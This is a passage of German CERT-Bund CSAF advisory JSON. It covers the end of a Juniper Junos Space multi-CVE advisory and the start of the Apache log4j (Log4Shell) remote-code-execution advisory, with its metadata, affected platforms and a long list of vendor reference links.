"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-25217"
},
{
"cve": "CVE-2021-27219",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-27219"
},
{
"cve": "CVE-2021-29154",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-29154"
},
{
"cve": "CVE-2021-29650",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-29650"
},
{
"cve": "CVE-2021-31535",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-31535"
},
{
"cve": "CVE-2021-32399",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-32399"
},
{
"cve": "CVE-2021-33033",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-33033"
},
{
"cve": "CVE-2021-33034",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-33034"
},
{
"cve": "CVE-2021-3347",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-3347"
},
{
"cve": "CVE-2021-33909",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-33909"
},
{
"cve": "CVE-2021-3653",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-3653"
},
{
"cve": "CVE-2021-3656",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-3656"
},
{
"cve": "CVE-2021-3715",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-3715"
},
{
"cve": "CVE-2021-37576",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-37576"
},
{
"cve": "CVE-2021-4104",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-4104"
},
{
"cve": "CVE-2021-42550",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-42550"
},
{
"cve": "CVE-2021-44228",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-44228"
},
{
"cve": "CVE-2021-45046",
"notes": [
{
"category": "description",
"text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte."
}
],
"product_status": {
"known_affected": [
"T025794"
]
},
"release_date": "2022-01-12T23:00:00.000+00:00",
"title": "CVE-2021-45046"
}
]
}
wid-sec-w-2022-0351
Vulnerability from csaf_certbund
Published
2021-12-09 23:00
Modified
2022-12-11 23:00
Summary
Apache log4j: Schwachstelle ermöglicht Codeausführung
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
Apache log4j ist ein Framework zum Loggen von Anwendungsmeldungen in Java.
Angriff
Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Apache log4j ausnutzen, um beliebigen Programmcode auszuführen.
Betroffene Betriebssysteme
- UNIX
- Linux
- Windows
- CISCO Appliance
- Juniper Appliance
- NetApp Appliance
- Native Hypervisor
- Applicance
- Sonstiges
- Hardware Appliance
{
"document": {
"aggregate_severity": {
"text": "kritisch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Apache log4j ist ein Framework zum Loggen von Anwendungsmeldungen in Java.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Apache log4j ausnutzen, um beliebigen Programmcode auszuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- UNIX\n- Linux\n- Windows\n- CISCO Appliance\n- Juniper Appliance\n- NetApp Appliance\n- Native Hypervisor\n- Applicance\n- Sonstiges\n- Hardware Appliance",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2022-0351 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2021/wid-sec-w-2022-0351.json"
},
{
"category": "self",
"summary": "WID-SEC-2022-0351 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-0351"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS-2022-225 vom 2022-12-09",
"url": "https://alas.aws.amazon.com/AL2022/ALAS-2022-225.html"
},
{
"category": "external",
"summary": "Red Hat Bugzilla - Bug 2030932 vom 2021-12-09",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-jfh8-c2jp-5v3q vom 2021-12-09",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "GitHub: CVE-2021-44228 Remote Code Injection In Log4j vom 2021-12-10",
"url": "https://github.com/jas502n/Log4j2-CVE-2021-44228"
},
{
"category": "external",
"summary": "Apache log4j Security Advisory vom 2021-12-10",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "Tweet von Deutsche Telekom CERT vom 2021-12-10",
"url": "https://twitter.com/DTCERT/status/1469258597930614787"
},
{
"category": "external",
"summary": "CERT-EU Security Advisory 2021-067 vom 2021-12-10",
"url": "https://media.cert.europa.eu/static/SecurityAdvisories/2021/CERT-EU-SA2021-067.pdf"
},
{
"category": "external",
"summary": "Elastic Security Announcement ESA-2021-31 vom 2021-12-13",
"url": "https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476"
},
{
"category": "external",
"summary": "ExtremeNetworks Vulnerability Notice VN-2020-465 vom 2021-12-12",
"url": "https://extremeportal.force.com/ExtrArticleDetail?an=000100806"
},
{
"category": "external",
"summary": "VMware Security Advisory VMSA-2021-0028 vom 2021-12-11",
"url": "https://www.vmware.com/security/advisories/VMSA-2021-0028.html"
},
{
"category": "external",
"summary": "FortiGuard Labs PSIRT Advisory FG-IR-21-245 vom 2021-12-12",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-245"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS-2021-003 vom 2021-12-11",
"url": "https://alas.aws.amazon.com/AL2022/ALAS-2021-003.html"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6525706 vom 2021-12-13",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-log4j-affects-websphere-application-server-cve-2021-44228/"
},
{
"category": "external",
"summary": "Debian Security Advisory DLA-2842 vom 2021-12-12",
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"
},
{
"category": "external",
"summary": "Cisco Security Advisory CISCO-SA-APACHE-LOG4J-QRUKNEBD vom 2021-12-10",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"category": "external",
"summary": "HCL Article KB0095493 vom 2021-12-13",
"url": "https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0095493"
},
{
"category": "external",
"summary": "Symantec Security Advisory SYMSA19793 vom 2021-12-13",
"url": "https://support.broadcom.com/security-advisory/content/security-advisories/Symantec-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerability/SYMSA19793"
},
{
"category": "external",
"summary": "Debian Security Advisory DSA-5020 vom 2021-12-12",
"url": "http://www.debian.org/security/2021/dsa-5020"
},
{
"category": "external",
"summary": "F-Secure Policy Manager Update vom 2021-12-12",
"url": "https://status.f-secure.com/incidents/sk8vmr0h34pd"
},
{
"category": "external",
"summary": "RSA SecurID Authentication Manager Update vom 2021-12-12",
"url": "https://community.rsa.com/t5/general-security-advisories-and/rsa-customer-advisory-apache-vulnerability-log4j2-cve-2021-44228/ta-p/660501"
},
{
"category": "external",
"summary": "Splunk Security Advisory vom 2021-12-12",
"url": "https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html"
},
{
"category": "external",
"summary": "Red Hat Security Bulletin RHSB-2021-009 vom 2021-12-13",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "Apache Kafka Mailing List vom 2021-12-12",
"url": "https://lists.apache.org/thread/lgbtvvmy68p0059yoyn9qxzosdmx4jdv"
},
{
"category": "external",
"summary": "Apache Struts Security Advice vom 2021-12-12",
"url": "https://struts.apache.org/announce-2021#a20211212-2"
},
{
"category": "external",
"summary": "Oracle Security Alert",
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"category": "external",
"summary": "Spring.io Blog",
"url": "https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot"
},
{
"category": "external",
"summary": "SOS Job Scheduler Vulnerability Release",
"url": "https://kb.sos-berlin.com/display/PKB/Vulnerability+Release+2.2.0"
},
{
"category": "external",
"summary": "SOS Job Scheduler Vulnerability Release",
"url": "https://kb.sos-berlin.com/display/PKB/Vulnerability+Release+1.13.10"
},
{
"category": "external",
"summary": "SAS Statement Regarding Remote Code Execution Vulnerability (CVE-2021-44228)",
"url": "https://support.sas.com/content/support/en/security-bulletins/remote-code-execution-vulnerability-cve-2021-44228.html"
},
{
"category": "external",
"summary": "Sammlung betroffener Produkte auf GitHub (NLD Nationaal Cyber Security Centrum)",
"url": "https://github.com/NCSC-NL/log4shell/tree/main/software"
},
{
"category": "external",
"summary": "Talos Intelligence Blog",
"url": "https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html"
},
{
"category": "external",
"summary": "Github User \"CronUp\"",
"url": "https://github.com/CronUp/Malware-IOCs/blob/main/2021-12-11_Log4Shell_Botnets"
},
{
"category": "external",
"summary": "Atlassian FAQ for CVE-2021-44228 vom 2021-12-12",
"url": "https://confluence.atlassian.com/kb/faq-for-cve-2021-44228-1103069406.html"
},
{
"category": "external",
"summary": "Siemens Security Advisory SSA-661247 vom 2021-12-13",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"
},
{
"category": "external",
"summary": "Unify Security Advisory Report OBSO-2112-01 vom 2021-12-13",
"url": "https://networks.unify.com/security/advisories/OBSO-2112-01.pdf"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA11259 vom 2021-12-13",
"url": "https://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA11259\u0026cat=SIRT_1"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5094 vom 2021-12-14",
"url": "https://access.redhat.com/errata/RHSA-2021:5094"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-5192-1 vom 2021-12-14",
"url": "https://ubuntu.com/security/notices/USN-5192-1"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5140 vom 2021-12-15",
"url": "https://access.redhat.com/errata/RHSA-2021:5140"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6526174 vom 2021-12-15",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-access-manager-9-0-7-1-and-ibm-security-verify-access-10-0-0-0-may-be-affected-by-the-log4j-vulnerability-cve-2021-44228-2/"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5137 vom 2021-12-15",
"url": "https://access.redhat.com/errata/RHSA-2021:5137"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5138 vom 2021-12-15",
"url": "https://access.redhat.com/errata/RHSA-2021:5138"
},
{
"category": "external",
"summary": "WIBU Security Advisory WIBU-211213-01 vom 2021-12-15",
"url": "https://cdn.wibu.com/fileadmin/wibu_downloads/security_advisories/Advisory_WIBU-211213-01.pdf"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6526274 vom 2021-12-15",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-blockchain-bridge-dependencies-are-vulnerable-to-an-issue-in-apache-log4j-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6526174 vom 2021-12-14",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-access-manager-9-0-7-1-and-ibm-security-verify-access-10-0-0-0-may-be-affected-by-the-log4j-vulnerability-cve-2021-44228/"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6526182 vom 2021-12-14",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-log4shell-vulnerability-affects-ibm-spss-statistics-cve-2021-44228/"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5093 vom 2021-12-14",
"url": "https://access.redhat.com/errata/RHSA-2021:5093"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5108 vom 2021-12-14",
"url": "https://access.redhat.com/errata/RHSA-2021:5108"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5126 vom 2021-12-14",
"url": "https://access.redhat.com/errata/RHSA-2021:5126"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5129 vom 2021-12-14",
"url": "https://access.redhat.com/errata/RHSA-2021:5129"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:5132 vom 2021-12-15",
"url": "https://access.redhat.com/errata/RHSA-2021:5132"
},
{
"category": "external",
